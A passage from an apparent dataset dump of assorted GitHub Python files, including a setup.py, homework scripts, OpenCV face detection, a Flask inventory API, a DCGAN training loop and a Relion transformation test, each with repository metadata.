f.readlines()\n kk_vv = map(lambda s: s.split('='), lines)\n k2v = dict(kk_vv)\n release = k2v[RELEASE_FIELD_NAME]\n nn = map(int, release.split('.'))\n assert len(nn) == 2\n return nn\n\n\ndef is_ubuntu_old():\n try:\n major, minor = get_ubuntu_release()\n except:\n return False # Guess it's recent.\n\n return major < 13 # Compat required.\n\n\nif platform.system() == 'Darwin':\n os.environ['CC'] = 'clang++'\n os.environ['CXX'] = 'clang++'\nelse:\n if is_ubuntu_old():\n os.environ['CC'] = 'g++-4.7'\n os.environ['CXX'] = 'g++-4.7'\n else:\n os.environ['CC'] = 'g++'\n os.environ['CXX'] = 'g++'\n\n\nif os.environ.get('CXX') == 'clang++':\n FLAGS = COMMON_BASE_FLAGS + CLANG_BASE_FLAGS + COMMON_LAPOS_FLAGS + \\\n CLANG_DISABLE_FLAGS + CLANG_LAPOS_FLAGS\nelse:\n FLAGS = COMMON_BASE_FLAGS + COMMON_LAPOS_FLAGS\n\n\nphraser = Extension(\n 'phraser.phraserext',\n sources=find_cc_files(SRC_ROOT) + ['phraser/cc/pyext/phraserext.cpp'],\n extra_compile_args=FLAGS,\n include_dirs=[SRC_ROOT, '.'],\n libraries=['boost_regex'],\n library_dirs=['/usr/local/lib/'],\n)\n\nsetup(\n name='phraser',\n version='0.1.10',\n author='James Knighton',\n author_email='iamknighton@gmail.com',\n description='Detects phrases in English text',\n license='MIT',\n packages=find_packages(exclude=['tests', 'scripts']),\n ext_modules=[phraser],\n long_description=resource_string(__name__, 'README.rst'),\n distclass=BinaryDistribution,\n)\n","repo_name":"knighton/phraser","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26223523017","text":"#1\r\na = 3\r\nb = 4\r\nc = 5\r\nif a < b:\r\n print('OK')\r\nelif c < b:\r\n print('OK')\r\nelif a + b == c:\r\n print('OK')\r\nelif a**2 + b**2 == c**2:\r\n print('OK')\r\n#2\r\nelse:\r\n print('NOT OK')\r\n \r\n#3\r\nimport math\r\nimport turtle\r\ncolor = input(\"Pick a color: \")\r\nwidth = int(input(\"Pick a line width: \"))\r\nlength = int(input(\"Pick a line length: \"))\r\nshape = input(\"Pick a shape: \")\r\ns = turtle.Screen()\r\nt = turtle.Turtle()\r\n\r\nt.color(color)\r\nt.width(width)\r\n\r\nif shape.lower() == \"line\":\r\n t.fd(length)\r\nelif shape.lower() == \"triangle\":\r\n t.fd(length)\r\n t.left(120)\r\n t.fd(length)\r\n t.left(120)\r\n t.fd(length)\r\nelif shape.lower() == \"square\":\r\n t.fd(length)\r\n t.left(90)\r\n t.fd(length)\r\n t.left(90)\r\n t.fd(length)\r\n t.left(90)\r\n t.fd(length)\r\nelse:\r\n print(\"Invalid shape\")\r\n","repo_name":"Ozypher/PythonDump","sub_path":"PYTHON/hw3sol.py","file_name":"hw3sol.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1965008996","text":"#FACE AND EYE DETECTION USING OPENCV\r\nimport cv2\r\n#cascade classifier: detects objects of different sizes in the input image\r\n#opencv already contains many pre trained classifiers for face,eyes,liscence plate detection,smile etc.those are xmlfiles.\r\nface_cascade=cv2.CascadeClassifier('C:/Users/vedavyas/Anaconda3/Lib/site-packages/cv2/data/haarcascade_frontalface_default.xml')\r\neye_cascade=cv2.CascadeClassifier('C:/Users/vedavyas/Anaconda3/Lib/site-packages/cv2/data/haarcascade_eye.xml')\r\ndef detect(gray,frame):\r\n #syntax of detectmultiplescale is detectMultipleScale(image,rejectlevels,levelweights)\r\n faces=face_cascade.detectMultiScale(gray,1.3,5)\r\n for(x,y,w,h) in faces:\r\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\r\n roi_gray=gray[y:y+h, x:x+w]\r\n roi_color=frame[y:y+h, x:x+w]\r\n #here scale factor=1.1,min neighbours=3 it will in range[3,5].\r\n eyes=eye_cascade.detectMultiScale(roi_gray,1.1,3)\r\n for(ex,ey,ew,eh) in eyes:\r\n cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\r\n return frame\r\n#to activate the webcamera\r\nvideo_capture=cv2.VideoCapture(0)\r\nwhile True:\r\n #capture frame by frame\r\n _,frame=video_capture.read()\r\n #our operations on the frame come here\r\n gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n canvas=detect(gray,frame)\r\n #display the resulting frame\r\n cv2.imshow('video',canvas)\r\n #ord('q') returns the unicode point of q.cv2.waitkey(1) returns the a 32 bit integer corresponding to the pressed key\r\n #and &0xFF is the bit mask which sets the left 24 bits to zero,because ord() returns a valve between 0 and 255.therefore\r\n #once the mask is applied,it is possible to check if it is the the coresponding key.\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n#this will make the camera to close after performing the actions[when everything done,release the video capture]\r\nvideo_capture.release()\r\n#finally it will simply destroy all the windows that we have created.if u want to destroy any specific window use cv2\r\ncv2.destroyAllWindows()","repo_name":"Vedavyas17/face-and-eye-detection-using-openCV","sub_path":"face and eye detection using openCV.py","file_name":"face and eye detection using openCV.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37660827420","text":"\nimport os\nfrom flask_cors import CORS\nfrom flask import Flask, json, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nfrom models.product import Product\nfrom shema.schemaApp import ProductSchema\nfrom querysApp import QuerysApp\nimport psycopg2\n\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n# db = SQLAlchemy(app) # Devuele instancia de base de datos\nglobal conn\nconn = psycopg2.connect( dbname=\"bd_inventory\", user=\"postgres\", password=\"root\", host=\"localhost\", port=\"5432\" )\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgresql://postgres:root@localhost:5432/bd_inventory\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app) # Devuele instancia de base de datos\ndb.create_all()\n\nproduct_schema = ProductSchema()\nproducts_schema = ProductSchema(many=True)\n\n@app.route('/add-product', methods=['POST'])\ndef createProduct():\n name = request.json['name']\n description = request.json['description']\n reference = request.json['reference']\n cant = request.json['cant']\n fech_update = request.json['fech_update']\n\n new_product = Product(None, name, description, reference, cant, fech_update)\n db.session.add(new_product)\n db.session.commit()\n return product_schema.jsonify(new_product)\n\n@app.route('/list-product', methods=['GET'])\ndef listProduct():\n all_products = QuerysApp.get_products_all()\n result = products_schema.dump(all_products)\n return jsonify(result)\n\n@app.route('/product/', methods=['PUT'])\ndef product_update(id):\n name = request.json['name']\n description = request.json['description']\n reference = request.json['reference']\n cant = request.json['cant']\n fech_update = request.json['fech_update']\n\n update_product = Product(None, name, description, reference, cant, fech_update)\n cursor = conn.cursor()\n query = ''' UPDATE product SET id=%s, name=%s, description=%s, reference=%s, cant=%s, fech_update=%s WHERE id=%s'''\n cursor.execute(query, (id, name, description, reference, cant, fech_update, id))\n conn.commit()\n return product_schema.jsonify(update_product)\n\n@app.route('/delete-product/', methods=['DELETE'])\ndef delete_product(id):\n print(f'El id es: {id}')\n cursor = conn.cursor()\n query = '''DELETE FROM public.product WHERE id=%s'''\n cursor.execute(query, (id))\n # ((product_schema), each['id'])\n conn.commit()\n conn.close()\n return {'message': f'Producto con id {id} fue eliminado con exito'}\n\n\n\nif __name__ == '__main__':\n os.system('cls')\n app.run(debug=True)","repo_name":"camilo19930/store-inventory-back","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33052787477","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\n\ndados = pd.read_excel('teste.xlsx')\nportadores = dados['NOME PORTADOR']\n\nx = 0\nfor portador in portadores:\n if (portador == 'Sigiloso'):\n x = x + 1\n\nprint(x)","repo_name":"araulima/teste_de_qualificacao","sub_path":"L_resp.py","file_name":"L_resp.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23509566001","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport itertools\nimport math\n\n\nclass CoinJam( object ):\n def __init__( self, inputFile, outputFile ):\n self.inputFile = inputFile\n self.outputFile = outputFile\n self.jamCoins = []\n\n with open( inputFile, 'r' ) as i, open( outputFile, 'w+' ) as o:\n inputFileContents = i.readlines()\n numberOfCases = inputFileContents[ 0 ]\n inputFileContents[ 1 ]\n self.N, self.J = map( int, inputFileContents[ 1 ].split() )\n\n self.calculateJamCoins()\n self.printJamCoins( o )\n\n def calculateJamCoins( self ):\n for cartProd in itertools.product( ( '0', '1' ), repeat = self.N - 2 ):\n cartProdInnerString = ''.join( cartProd )\n cartProdString = '1' + cartProdInnerString + '1'\n baseReps = []\n for base in xrange( 2, 11 ):\n baseRep = int( cartProdString, base = base )\n baseReps.append( baseRep )\n\n nontrivialDivisors = map( CoinJam.isPrime, baseReps )\n if all( map( lambda x: x != 0, nontrivialDivisors ) ):\n self.jamCoins.append( ( cartProdString, baseReps, nontrivialDivisors ) )\n print( 'FOUND JAMCOIN #' + str( len( self.jamCoins ) ) )\n else:\n print( cartProdString + ' is not a jamcoin' )\n\n if len( self.jamCoins ) == self.J:\n return\n\n #print( cartProdString + ' : ' + str( zip( baseReps, nontrivialDivisors ) ) )\n\n @staticmethod\n def isPrime( number ):\n print( 'isPrime( ' + str( number ) + ' )' )\n if number % 2 == 0 and number > 2:\n return 2\n for i in xrange( 3, int( math.sqrt( number ) ) + 1, 2 ):\n print( str( number ) + ' / ' + str( i ) )\n if ( number % i ) == 0:\n return i\n\n return 0\n\n def printJamCoins( self, outputFile ):\n print( 'Case #1:', file = outputFile )\n for jamCoin in self.jamCoins:\n print( jamCoin[ 0 ] + ' ' + ' '.join( map( str, jamCoin[ 2 ] ) ), file = outputFile )\n #print( jamCoin[ 0 ] + ': ' + ' '.join( map( str, zip( jamCoin[ 1 ], jamCoin[ 2 ] ) ) ) )\n\n\nif __name__ == '__main__':\n #coinJam = CoinJam( 'testInput.txt', 'results.txt' )\n #coinJam = CoinJam( 'C-small-attempt0.in', 'results-small.txt' )\n #coinJam = CoinJam( 'C-large.in', 'results-large.txt' )\n coinJam = CoinJam( 'C-large.in', 'test.txt' )\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_179/3180.py","file_name":"3180.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33887373365","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division, unicode_literals\n\nimport torch\n\nfrom onmt.utils.logging import init_logger\nfrom onmt.translate.translator import build_translator\n\nfrom onmt.opts_translate import OPT_TRANSLATE\n\n\ndef synthesis(opt, tgt_data_iter):\n torch.cuda.set_device(opt.gpu)\n translator = build_translator(opt, report_score=True)\n all_scores, all_predictions = translator.translate(src_path=opt.src,\n tgt_data_iter=tgt_data_iter,\n tgt_path=opt.tgt,\n src_dir=opt.src_dir,\n batch_size=opt.batch_size,\n attn_debug=opt.attn_debug)\n\n return all_predictions\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n opt = OPT_TRANSLATE()\n\n logger = init_logger(opt.log_file)\n # synthesis(opt,tgt_data_iter)\n","repo_name":"jkwang93/ChemistGA","sub_path":"transformer_model/get_reaction_results.py","file_name":"get_reaction_results.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"40135385320","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom IPython.display import HTML\nimport numpy as np\nfrom torch.optim.lr_scheduler import StepLR\nimport torchvision.utils as vutils\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom scipy import linalg\nfrom scipy.stats import entropy\nimport random\nimport tqdm\n# Resize image to this size\nimage_size=64\nrandom.seed(40)\n\n# Setting up transforms to resize and normalize \ntransform=transforms.Compose([ transforms.Resize(image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n# batchsize of dataset\nbatch_size = 128\n\n# Load STL-10 Dataset\ngan_train_dataset = datasets.STL10(root='./stl10_data/', split='train', transform=transform, download=True)\ngan_train_loader = torch.utils.data.DataLoader(dataset=gan_train_dataset, batch_size=batch_size, shuffle=True)\n\n\nclass DCGAN_Generator(torch.nn.Module):\n def __init__(self):\n super(DCGAN_Generator,self).__init__()\n self.l1 = torch.nn.ConvTranspose2d(100, 1024, kernel_size=4, stride=1, padding=0, bias=False)\n self.bn1 = torch.nn.BatchNorm2d(1024)\n self.l2 = torch.nn.ConvTranspose2d(1024, 512, kernel_size=4, stride=2, padding=1, bias=False)\n self.bn2 = torch.nn.BatchNorm2d(512)\n self.l3 = torch.nn.ConvTranspose2d(512, 256, kernel_size=4, stride=2, padding=1, bias=False)\n self.bn3 = torch.nn.BatchNorm2d(256)\n self.l4 = torch.nn.ConvTranspose2d(256, 128, kernel_size=4, stride=2, padding=1, bias=False)\n self.bn4 = torch.nn.BatchNorm2d(128)\n self.l5 = torch.nn.ConvTranspose2d(128, 3, kernel_size=4, stride=2, padding=1)\n self.relu = torch.nn.ReLU()\n self.tanh = torch.nn.Tanh()\n\n self.layer = torch.nn.Sequential(self.l1, self.bn1, self.relu, self.l2, self.bn2, self.relu, self.l3, self.bn3, self.relu, self.l4, self.bn4, self.relu, self.l5, self.tanh)\n\n def forward(self, input):\n return self.layer(input)\n #return torch.tanh(self.l4(output))\n\nclass DCGAN_Discriminator(torch.nn.Module):\n def __init__(self):\n super(DCGAN_Discriminator, self).__init__()\n self.l1 = torch.nn.Conv2d(3, 128, kernel_size=4, stride=2, padding=1)\n self.l2 = torch.nn.Conv2d(128, 256, kernel_size=4, stride=2, padding=1, bias=False) \n self.bn2 = torch.nn.BatchNorm2d(256)\n self.l3 = torch.nn.Conv2d(256, 512, kernel_size=4, stride=2, padding=1, bias=False) \n self.bn3 = torch.nn.BatchNorm2d(512)\n self.l4 = torch.nn.Conv2d(512, 1024, kernel_size=4, stride=2, padding=1, bias=False)\n self.bn4 = torch.nn.BatchNorm2d(1024)\n self.l5 = torch.nn.Conv2d(1024, 1, kernel_size=4, stride=1, padding=0)\n self.sigmoid = torch.nn.Sigmoid()\n self.relu = torch.nn.LeakyReLU(negative_slope=0.2, inplace=True)\n self.layer = nn.Sequential(self.l1, self.relu, self.l2, self.bn2, self.relu, self.l3, self.bn3, self.relu , self.l4, self.bn4, self.relu, self.l5, self.sigmoid)\n\n def forward(self, input):\n return self.layer(input)\n\ntorch.autograd.set_detect_anomaly(True)\nfake = torch.load('test_case_GAN/fake.pt')\nnetD = torch.load('test_case_GAN/netD.pt')\nreal = torch.load('test_case_GAN/real.pt')\nnetG = torch.load('test_case_GAN/netG.pt')\nnoise = torch.load('test_case_GAN/noise.pt')\nValid_label = torch.load('test_case_GAN/Valid_label.pt')\nFake_label = torch.load('test_case_GAN/Fake_label.pt')\ncriterion = torch.load('test_case_GAN/criterion.pt')\n\n\ndef loss_discriminator(D, real, G, noise, Valid_label, Fake_label, criterion):\n '''\n 1. Forward real images into the discriminator\n 2. Compute loss between Valid_label and dicriminator output on real images\n 3. Forward noise into the generator to get fake images\n 4. Forward fake images to the discriminator\n 5. Compute loss between Fake_label and discriminator output on fake images\n 6. sum real loss and fake loss as the loss_D\n 7. we also need to output fake images generate by G(noise) for loss_generator computation\n '''\n\n real = torch.squeeze(real, 1)\n real = torch.squeeze(real, 1)\n real = torch.squeeze(real, 1)\n #print(netG)\n\n\n #print(\"real image SHAPE\", real.shape)\n d = D(real)\n #print(\"Real disc output\", d)\n real_output = torch.squeeze(d, 1)\n real_output = torch.squeeze(real_output, 1)\n real_output = torch.squeeze(real_output, 1)\n\n #print(Valid_label.shape)\n #print(real_output.shape)\n\n real_loss = criterion(Valid_label, real_output)\n\n print(\"nan in noise?\", torch.isnan(noise).any())\n fake_gen = G(noise)\n print(\"nan in output of G?\", torch.isnan(fake_gen).any())\n #print(D)\n #print(\"Generator output SHAPE\", fake_gen.shape)\n d2 = D(fake_gen)\n #print(\"Fake disc output\", d2)\n fake_output = torch.squeeze(d2, 1)\n fake_output = torch.squeeze(fake_output, 1)\n fake_output = torch.squeeze(fake_output, 1)\n\n\n fake_loss = criterion(Fake_label, fake_output)\n\n #print(real_loss, fake_loss)\n loss_D = real_loss + fake_loss\n\n return loss_D, fake_gen\n\ndef loss_generator(netD, fake, Valid_label, criterion):\n '''\n 1. Forward fake images to the discriminator\n 2. Compute loss between valid labels and discriminator output on fake images\n '''\n\n #print(fake)\n pred = netD(fake) \n #print(\"OUT\", pred)\n\n pred = torch.squeeze(pred, 1)\n pred = torch.squeeze(pred, 1)\n pred = torch.squeeze(pred, 1) \n loss_G = criterion(Valid_label, pred)\n return loss_G\n\n\n#print(netD)\n\nloss_D, fake_G = loss_discriminator(netD, real, netG, noise, Valid_label, Fake_label, criterion)\ntorch.save(loss_D, 'test_case_GAN/loss_D.pt')\nloss_G = loss_generator(netD, fake, Valid_label, criterion)\ntorch.save(loss_G, 'test_case_GAN/loss_G.pt')\n\ntest_loss_D = torch.load('test_case_GAN/loss_D.pt')\ntest_loss_G = torch.load('test_case_GAN/loss_G.pt')\n\nprint('test case loss_D:', test_loss_D.item())\nprint('computed loss_D:', loss_D.item())\n\nprint('test case loss_G:', test_loss_G.item())\nprint('computed loss_G:', loss_G.item())\n\n\n\nimport torchvision.utils as vutils\nfrom torch.optim.lr_scheduler import StepLR\nimport pdb\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n# Number of channels\nnc = 3\n# Size of z latent vector (i.e. size of generator input)\nnz = 100\n# Size of feature maps in generator\nngf = 128\n# Size of feature maps in discriminator\nndf = 128\n\n\n# custom weights initialization called on netG and netD\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\n# Create the generator and discriminator\nnetG = DCGAN_Generator().to(device)\nnetD = DCGAN_Discriminator().to(device)\n\n# Apply weight initialization\nnetG.apply(weights_init)\nnetD.apply(weights_init)\n\n\n# Initialize BCELoss function\ncriterion = nn.BCELoss()\n\n# Create latent vector to test the generator performance\nfixed_noise = torch.randn(36, nz, 1, 1, device=device)\n\n# Establish convention for real and fake labels during training\nreal_label = 1\nfake_label = 0\n\nlearning_rate = 0.0002\nbeta1 = 0.5\n\n# Setup Adam optimizers for both G and D\noptimizerD = optim.Adam(netD.parameters(), lr=learning_rate, betas=(beta1, 0.999))\noptimizerG = optim.Adam(netG.parameters(), lr=learning_rate, betas=(beta1, 0.999))\n\nimg_list = []\nreal_img_list = []\nG_losses = []\nD_losses = []\niters = 0\nnum_epochs = 100\n\n \ndef load_param(num_eps):\n model_saved = torch.load('/content/gan_{}.pt'.format(num_eps))\n netG.load_state_dict(model_saved['netG'])\n netD.load_state_dict(model_saved['netD'])\n\n# GAN Training Loop\nfor epoch in range(num_epochs):\n for i, data in enumerate(gan_train_loader, 0):\n real = data[0].to(device)\n b_size = real.size(0)\n noise = torch.randn(b_size, nz, 1, 1, device=device)\n\n Valid_label = torch.full((b_size,), real_label, dtype=torch.float, device=device)\n Fake_label = torch.full((b_size,), fake_label, dtype=torch.float, device=device)\n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n\n netD.zero_grad()\n torch.nn.utils.clip_grad_norm_(netD.parameters(), 1)\n\n # Function to compute discriminator loss\n loss_D, fake = loss_discriminator(netD, real, netG, noise, Valid_label, Fake_label, criterion)\n\n\n # torch.save(fake,'test_case_GAN/fake.pt')\n # torch.save(netD,'test_case_GAN/netD.pt')\n # torch.save(real,'test_case_GAN/real.pt')\n # torch.save(netG,'test_case_GAN/netG.pt')\n # torch.save(noise,'test_case_GAN/noise.pt')\n # torch.save(Valid_label,'test_case_GAN/Valid_label.pt')\n # torch.save(Fake_label,'test_case_GAN/Fake_label.pt')\n # torch.save(criterion,'test_case_GAN/criterion.pt')\n\n # pdb.set_trace()\n loss_D.backward(retain_graph=True)\n # Update D\n\n for name, param in netD.named_parameters():\n print(name, param.grad)\n print(name, torch.isfinite(param.grad).all())\n \n optimizerD.step() \n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n netG.zero_grad()\n # Function to compute generator loss\n\n loss_G = loss_generator(netD, fake, Valid_label, criterion)\n # Calculate gradients for G\n loss_G.backward()\n # Update G\n\n torch.nn.utils.clip_grad_norm_(netG.parameters(), 1)\n optimizerG.step() \n\n # Output training stats\n if i % 50 == 0:\n print('[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\t'\n % (epoch, num_epochs, i, len(gan_train_loader),\n loss_D.item(), loss_G.item()))\n\n # Save Losses for plotting later\n G_losses.append(loss_G.item())\n D_losses.append(loss_D.item())\n\n # Check how the generator is doing by saving G's output on fixed_noise\n if (iters % 500 == 0) or ((epoch == num_epochs-1) and (i == len(gan_train_loader)-1)):\n with torch.no_grad():\n fake = netG(fixed_noise).detach().cpu()\n img_list.append(vutils.make_grid(fake, padding=2, normalize=True))\n\n iters += 1\n\n \n\nplt.title(\"Generator and Discriminator Loss During Training\")\nplt.plot(G_losses,label=\"G\")\nplt.plot(D_losses,label=\"D\")\nplt.xlabel(\"iterations\")\nplt.ylabel(\"Loss\")\nplt.legend()\nplt.show()\n\ncheckpoint = {'netG': netG.state_dict(),\n 'netD': netD.state_dict()}\ntorch.save(checkpoint, 'content/gan_{}.pt'.format(num_epochs))\n","repo_name":"ajyanand/GeneralAdverserialNetworks","sub_path":"GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":10960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13330802249","text":"from Distance_Grid import Distance_Grid\nfrom Binary_tree import BinaryTree\nfrom Cell import Cell\n\n\n\ngrid = Distance_Grid(5, 5)\nBinaryTree.on(grid)\n\n\nstart = grid.plane_grid[0][0]\ndistance = start.distances()\ngrid.set_distance(distance)\n\nprint(str(grid))\n\nimg = grid.to_png()\nimg.save(\"maze.png\")\n\ngrid.distances = distance.path_to(grid.plane_grid[grid.rows - 1][0])\n\nprint(str(grid))\n\n\n\n","repo_name":"lorcanj/Maze","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40708581220","text":"from windrose import WindroseAxes\nfrom matplotlib import pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\nimport parameter\nimport pandas as pd\n\n### getting parameter\nparameter = parameter.SiteInfo()\nsiteName = parameter.name\nreturnPeriod = parameter.returnPeriod()\n\n### read data\ninputFileName = siteName+str(returnPeriod)+\"YearsVmax.csv\"\ndataset = pd.read_csv(inputFileName,header=None,sep=' ')\ndataset = np.array(dataset)\nm ,n = np.shape(dataset)\nSpd = dataset[:,0] \nDir = dataset[:,1]\n \nfig = plt.gcf() \nax = WindroseAxes.from_ax()\nax.bar(Dir, Spd, normed=True, opening=0.8, edgecolor='white')\nax.set_legend()\n \nplt.show()\nfigName = siteName+str(returnPeriod)+\"YearsWindRose.png\" \nfig.savefig(figName)\nplt.close()\n","repo_name":"islandowner95/typhoon-risk-all","sub_path":"typhoonRiskV2p0/plotWindRose.py","file_name":"plotWindRose.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70562348675","text":"# coding=utf-8\n\nimport pandas as pd\nimport numpy as np\n\n\na1 = [1, 2, 3, 4]\na2 = ['a', 'b', 'c', 'd']\na3 = pd.Series(data=a1, index=a2, name='chen')\n# index 是索引列\n# data 是数据列 date和index 长度必须相同\nprint(a3)\n\nprint(a3.index) # 取出索引列\nprint(a3.name) # Series对象的名字\nprint(a3.values) # 取出数据列\nprint(a3.dtype) # 元素类型\n\n\n# index 要么不提供,要么提供的时候必须和data长度一致\na5 = np.array([1, 2, 4, 4]) # 创建一个简单的相当于py中的list\na4 = pd.Series(data=a5)\n\nprint(a4)\n\n\n\n# 如果传的数据是已经自带索引了 就不需要再传递索引 比如字典,或者已经建立的Series\na6 = {\"a\": 1, \"b\": 2, \"c\": 3, 'd': 44}\na7 = pd.Series(data=[1,2,3,5,5], index=['z1', 'z2', 'z3', 'z4', 'z1'])\nf4 = [11, 22, 33, 44, 55]\n# q1 = pd.Series(data=a7, index=f4)\nq2 = pd.Series(data=a6, index=f4)\nprint(q2)\n\n\ndata = [\n [1, 2, 3],\n [\"aaaa\", 5, 6]\n]\n\nindex = ['a', 'b']\ncolumns = ['c', 'd', 'e']\np = pd.DataFrame(index=index, data=data, columns=columns)\nprint(p)\n\n\n","repo_name":"coopergoon/jupyter","sub_path":"pd/pd_demo1.py","file_name":"pd_demo1.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19006312193","text":"# *\n# * Authors: Scipion Team\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia , CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion-users@lists.sourceforge.net'\n# *\n# **************************************************************************\nfrom reliontomo.convert.convertBase import getTransformInfoFromCoordOrSubtomo, genTransformMatrix\nfrom pyworkflow.tests import BaseTest\nfrom pwem.objects import Transform\nfrom pwem.convert.transformations import euler_matrix\nimport numpy as np\nfrom reliontomo.objects import RelionPSubtomogram\n\n\nclass TestTransformationConversion(BaseTest):\n\n\n def test_transformations(self):\n \"\"\"Test conversion o alignment information from and to relion\"\"\"\n self._test_set_transformations()\n\n def getInitialValues(self):\n \"\"\" Returns initial values, Use commented code to test a specific case\"\"\"\n fromRealCase =\"3.290925 -1.08901 40.351380 65.410000 175.090000 18.310000\"\n fromRealCase = fromRealCase.split()\n return float(fromRealCase[0]), float(fromRealCase[1]), float(fromRealCase[2]), \\\n float(fromRealCase[3]), float(fromRealCase[4]), float(fromRealCase[5]),\n def _test_set_transformations(self):\n\n\n xShift ,yShift ,zShift, rot, tilt, psi =self.getInitialValues()\n\n self._test_single_conversion(psi, rot, tilt, 0, 0, 0, \"ONLY ANGLES\")\n self._test_single_conversion(0, 0, 0, xShift, yShift, zShift, \"ONLY SHIFTS\")\n self._test_single_conversion(psi, rot, tilt, xShift, yShift, zShift, \"COMPLETE\")\n\n def _test_single_conversion(self, psi, rot, tilt, xShift, yShift, zShift, testName):\n\n self._test_direct_conversion(psi, rot, tilt, xShift, yShift, zShift, testName)\n\n rotRad = np.deg2rad(rot)\n titlRad = np.deg2rad(tilt)\n psiRad = np.deg2rad(psi)\n alignmentMatrix = euler_matrix(rotRad, titlRad, psiRad, axes=\"szyz\")\n alignmentMatrix[0, 3] = xShift\n alignmentMatrix[1, 3] = yShift\n alignmentMatrix[2, 3] = zShift\n # Convert to relion\n # We need a faked subtomogram or coordinate\n subtomo = RelionPSubtomogram()\n t = Transform(matrix=alignmentMatrix)\n subtomo.setTransform(t)\n rlnAngles, rlnShifts = getTransformInfoFromCoordOrSubtomo(subtomo, samplingRate=2)\n returningMatrix = genTransformMatrix(rlnShifts[0], rlnShifts[1], rlnShifts[2],\n rlnAngles[0], rlnAngles[1], rlnAngles[2], 2)\n\n ok = np.allclose(alignmentMatrix, returningMatrix)\n\n if not ok:\n print(\"*******\", testName, \"*******\")\n print(\"EXPECTED MATRIX:\\n %s\" % np.array_str(alignmentMatrix, precision=2, suppress_small=True))\n print(\"RESULT MATRIX:\\n %s\" % np.array_str(returningMatrix, precision=2, suppress_small=True))\n\n self.assertTrue(ok, \"Relion-Scipion transformations %s is wrong.\" % (testName))\n\n\n def _test_direct_conversion(self, psi, rot, tilt, xShift, yShift, zShift, testName):\n\n # Matrix for scipion\n alignmentMatrix = genTransformMatrix(xShift, yShift, zShift, rot, tilt, psi, 1.35)\n\n subtomo = RelionPSubtomogram()\n t = Transform(matrix=alignmentMatrix)\n subtomo.setTransform(t)\n\n # From scipion to relion\n rlnAngles, rlnShifts = getTransformInfoFromCoordOrSubtomo(subtomo, samplingRate=1.35)\n\n self.assertAlmostEqual(rlnAngles[0], rot, places=2,msg=\"Rot not expected for direct 